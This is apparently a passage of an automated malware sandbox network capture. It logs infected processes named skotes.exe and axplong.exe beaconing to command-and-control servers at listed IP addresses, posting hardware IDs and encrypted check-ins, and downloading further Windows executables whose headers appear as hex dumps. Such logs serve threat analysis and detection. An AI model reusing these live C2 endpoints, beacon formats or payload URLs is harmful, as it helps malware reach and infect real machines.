                                                      Sep 24, 2024 15:37:19.102505922 CEST1236INData Raw: 54 24 20 74 66 8b 4c 24 08 eb 32 89 4c 24 08 89 d1 89 c3 ba cd cc cc cc f7 e2 c1 ea 03 8d 04 12 8d 04 80 29 c3 80 cb 30 88 5c 34 63 4e 89 d0 89 ca 8b 4c 24 08 8b 5c 24 1c 85 c0 74 32 f6 c3 40 74 c9 83 fa 03 74 07 89 4c 24 08 42 eb c1 89 c2 0f b6
                                                      Data Ascii: T$ tfL$2L$)0\4cNL$\$t2@ttL$BD$0D4cNI1uL$D$D$u.BD4c0N4d9@tuD$D4cNI1|4d0D$8D$D-x u+tD$DT$E 4d
                                                      Sep 24, 2024 15:37:19.102511883 CEST1120INData Raw: c1 f9 02 01 c1 89 c8 ba 67 66 66 66 f7 ea 2b 5c 24 04 89 d0 c1 e8 1f c1 fa 02 01 c2 01 d2 8d 14 92 89 c8 29 d0 80 cb 30 8b 54 24 08 88 54 24 38 88 5c 14 38 04 30 88 44 14 37 83 fe 64 72 3e 89 d3 89 f0 b9 1f 85 eb 51 f7 e9 89 d1 89 d0 c1 e8 1f c1
                                                      Data Ascii: gfff+\$)0T$T$8\80D7dr>Qgfff)0D$8TT$+T$BL$@D$#T$9|)D$\$wdvwRwBvw
                                                      Sep 24, 2024 15:37:19.102516890 CEST1236INData Raw: 14 83 e0 03 f7 d3 01 d9 89 44 24 04 89 44 24 20 39 c8 8b 44 24 04 72 02 89 c8 89 44 24 04 40 50 6a 30 52 e8 af a4 00 00 83 c4 0c 8b 4c 24 10 01 ce 8b 44 24 20 39 c6 72 02 89 c6 8b 44 24 14 8b 54 24 04 01 c2 83 c2 02 29 f1 01 cb 89 d8 e9 29 03 00
                                                      Data Ascii: D$D$ 9D$rD$@Pj0RL$D$ 9rD$T$))T$\$$T$)T$D$+D$D$T$F\$$)L$|$D4BD$80D$;D$(L$+D$D$@$)L$$1D$
                                                      Sep 24, 2024 15:37:19.102523088 CEST1236INData Raw: 24 34 39 d6 7f 02 89 d6 29 d6 89 74 24 34 29 4c 24 14 8b 4c 24 1c f6 c1 01 8b 74 24 2c 75 09 f6 c1 10 75 08 31 db eb 20 89 cb eb 1c 89 cb 8b 4c 24 34 8b 54 24 14 39 d1 7f 02 89 d1 89 4c 24 14 c7 44 24 34 00 00 00 00 8b 4c 24 34 03 4c 24 14 89 5c
                                                      Data Ascii: $49)t$4)L$L$t$,uu1 L$4T$9L$D$4L$4L$\$M|$4BL$4L$4))L$49|}uT$4T$t$,tGt@Z9rFPj W$G)t$,\$T
                                                      Sep 24, 2024 15:37:19.102528095 CEST1236INData Raw: c1 10 31 f6 88 4f 01 83 c7 02 83 c0 fe 74 a0 b1 30 f6 c3 40 74 2a 3b 74 24 08 75 23 0f b6 15 01 f0 44 00 88 d5 00 d5 80 e5 20 28 ea 80 c2 10 31 f6 eb 0f 90 90 90 90 90 90 90 90 90 90 90 90 46 b2 30 88 17 f6 c3 40 74 bb 3b 74 24 08 74 a0 46 eb b2
                                                      Data Ascii: 1Ot0@t*;t$u#D (1F0@t;t$tFD$Dt$,L$EL$D$D}t)%)9|(L$Dt$,1t$FD$B9u)t$,\
                                                      Sep 24, 2024 15:37:19.102534056 CEST1236INData Raw: 88 00 00 00 89 c1 83 e1 07 0f 84 cc 00 00 00 89 74 24 04 31 d2 90 90 90 90 90 90 89 de 0f b6 1c 13 88 1c 17 89 f3 42 39 d1 75 f0 01 d7 89 c1 29 d1 01 d3 8b 74 24 04 83 f8 08 72 50 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f b6 03 88 07 0f b6
                                                      Data Ascii: t$1B9u)t$rPCGCGCGCGCGCGCGu\$}\$,)JfD$LPuSUIeI|
                                                      Sep 24, 2024 15:37:19.107884884 CEST1236INData Raw: b9 ff c9 9a 3b 39 d9 19 f8 0f 92 c0 0f b6 c0 8d 14 c0 42 89 d0 89 74 24 04 29 f0 90 90 90 90 90 90 90 90 90 90 90 90 8b 0c d5 fc c0 44 00 8b 34 d5 f8 c0 44 00 39 f3 19 cf 72 0d 42 40 83 fa 14 8b 7c 24 08 75 e1 eb 4e 39 54 24 04 73 05 83 f8 17 76
                                                      Data Ascii: ;9Bt$)D4D9rB@|$uN9T$sv|$=<D|$D|$9\$(Rt$WPD$~LjhWSD$i)uPD$|


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      132192.168.2.749904185.215.113.3780
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:18.714046001 CEST89OUTGET / HTTP/1.1
                                                      Host: 185.215.113.37
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Sep 24, 2024 15:37:19.421669006 CEST203INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:37:19 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 0
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Sep 24, 2024 15:37:20.345850945 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFID
                                                      Host: 185.215.113.37
                                                      Content-Length: 211
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a
                                                      Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="build"save------IIJKJDAFHJDHIEBGCFID--
                                                      Sep 24, 2024 15:37:20.578883886 CEST210INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:37:20 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 8
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                      Data Ascii: YmxvY2s=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      133192.168.2.749905185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:20.357609987 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:37:21.052594900 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:20 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      134192.168.2.749907185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:20.977899075 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 33 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000314001&unit=246122658369
                                                      Sep 24, 2024 15:37:21.692821980 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:21 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      135192.168.2.749908147.45.44.104807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:21.714090109 CEST66OUTGET /malesa/66ed86be077bb_12.exe HTTP/1.1
                                                      Host: 147.45.44.104
                                                      Sep 24, 2024 15:37:22.357032061 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 24 Sep 2024 13:37:22 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 10796768
                                                      Last-Modified: Fri, 20 Sep 2024 14:29:18 GMT
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=120
                                                      ETag: "66ed86be-a4bee0"
                                                      X-Content-Type-Options: nosniff
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5d 95 67 ab 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 f2 4e 00 00 f0 54 00 00 00 00 00 7e 10 4f 00 00 20 00 00 00 20 4f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 a4 00 00 04 00 00 65 29 a5 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 30 10 4f 00 4b 00 00 00 00 40 4f 00 56 e2 54 00 00 00 00 00 00 00 00 00 00 f0 a3 00 e0 d8 00 00 00 40 a4 00 0c 00 00 00 eb 0f 4f 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL]gNT~O O@ `e)@0OK@OVT@O H.textN N `.sdata ON@.rsrcVT@OTO@@.reloc@@B
                                                      Sep 24, 2024 15:37:22.357050896 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: `OHgMn};(L7*(L7****(L7***
                                                      Sep 24, 2024 15:37:22.357070923 CEST448INData Raw: 26 d0 70 00 00 01 28 24 00 00 0a 72 91 01 00 70 72 cf 01 00 70 14 28 3d 00 00 0a 72 d3 01 00 70 28 3f 00 00 0a 28 40 00 00 0a 1a 8d 20 00 00 01 25 16 08 a2 25 17 72 dd 01 00 70 72 35 02 00 70 72 3d 02 00 70 28 3d 00 00 0a 72 c9 00 00 70 72 43 02
                                                      Data Ascii: &p($rprp(=rp(?(@ %%rpr5pr=p(=rprCpo=rGpropo=%q% % (O& (Q9&p($rKpraprgp(=(? %(A%rmpr[prwp(=r{prpo=
                                                      Sep 24, 2024 15:37:22.357187986 CEST1236INData Raw: 51 00 00 06 39 de fd ff ff 26 28 df 37 00 06 20 03 00 00 00 38 ce fd ff ff 2a 00 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00
                                                      Data Ascii: Q9&(7 8*0*0********.(7(L7*0*0*0*******
                                                      Sep 24, 2024 15:37:22.357206106 CEST1236INData Raw: 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00
                                                      Data Ascii: *******************************
                                                      Sep 24, 2024 15:37:22.357217073 CEST1236INData Raw: 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 1a 28 4c 37 00 06 2a 00 13 30 06 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00
                                                      Data Ascii: ****(L7*0*0*****(L7*0*****(L7*0*********
                                                      Sep 24, 2024 15:37:22.357240915 CEST1236INData Raw: 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 01 10 00 00 02 00 28 00 19 41 00 0d 00 00 00 00 1a 28 4c 37 00 06 2a 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 07 00 04 00 00 00 00 00
                                                      Data Ascii: 0*(A(L7***0*0*0*0*0*0*0***0******
                                                      Sep 24, 2024 15:37:22.357254982 CEST1236INData Raw: 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 1a 28 4c 37 00 06 2a 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00
                                                      Data Ascii: ***(L7*0******(L7********(L7*0*0********
                                                      Sep 24, 2024 15:37:22.357275963 CEST1236INData Raw: 00 06 2a 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00
                                                      Data Ascii: ****0********0(L7 (H:(&~Ts8* E1L8& (H:&Es
                                                      Sep 24, 2024 15:37:22.357295990 CEST1236INData Raw: 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 1a 28 4c 37 00 06 2a 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00
                                                      Data Ascii: ******(L7*****(L7********0**0**0**0**
                                                      Sep 24, 2024 15:37:22.362226963 CEST1236INData Raw: 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00
                                                      Data Ascii: *****************************0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      136192.168.2.749909185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:22.605885029 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:37:23.314929008 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:23 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      137192.168.2.749910185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:25.352794886 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:37:26.048780918 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:25 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      138192.168.2.749911185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:27.571455956 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:37:28.275670052 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:28 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      139192.168.2.749912185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:30.787723064 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:37:31.519651890 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:31 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      140192.168.2.749913185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:32.569717884 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 33 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000318001&unit=246122658369
                                                      Sep 24, 2024 15:37:33.283051968 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:33 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      141192.168.2.749914185.215.113.3780
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:32.682578087 CEST89OUTGET / HTTP/1.1
                                                      Host: 185.215.113.37
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Sep 24, 2024 15:37:33.387440920 CEST203INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:37:33 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 0
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Sep 24, 2024 15:37:34.272300005 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----EBKJDBAAKJDGCBFHCFCG
                                                      Host: 185.215.113.37
                                                      Content-Length: 211
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 47 2d 2d 0d 0a
                                                      Data Ascii: ------EBKJDBAAKJDGCBFHCFCGContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------EBKJDBAAKJDGCBFHCFCGContent-Disposition: form-data; name="build"save------EBKJDBAAKJDGCBFHCFCG--
                                                      Sep 24, 2024 15:37:34.503062963 CEST210INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:37:34 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 8
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                      Data Ascii: YmxvY2s=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      142192.168.2.749915103.130.147.211807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:34.249692917 CEST52OUTGET /Files/2.exe HTTP/1.1
                                                      Host: 103.130.147.211
                                                      Sep 24, 2024 15:37:34.841195107 CEST1236INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:37:34 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                      Last-Modified: Mon, 23 Sep 2024 15:59:37 GMT
                                                      ETag: "65ec4b-622cb79d4984d"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 6679627
                                                      Content-Type: application/x-msdownload
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d5 30 f1 66 00 4c 5f 00 d4 26 00 00 e0 00 06 01 0b 01 02 23 00 e6 47 00 00 9e 5a 00 00 e2 66 00 b0 14 00 00 00 10 00 00 00 00 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 c6 00 00 06 00 00 87 ce 66 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 80 b3 00 42 00 00 00 00 90 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b3 00 d4 29 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 ad 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0fL_&#GZfH@f B)H.textGG`P`.dataHG@`.rdata HH@`@/4HH@0@.bssfL`.edataBjL@0@.idatalL@0.CRT4vL@0.tlsxL@0.reloc)*zL@0B/14Z@B/29Z@B/41XLNT\@B/55B\@B/67T]
                                                      Sep 24, 2024 15:37:34.841207027 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 38 30 00 00 00 00 00 61 09 00 00 00 10 c5 00 00 0a 00 00 00 a4 5d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 31 00 00 00 00 00 05 8b 01 00 00 20 c5 00 00 8c 01 00 00 ae 5d 00 00 00 00
                                                      Data Ascii: @0B/80a]@B/91 ]@B/102:_@B
                                                      Sep 24, 2024 15:37:34.841222048 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
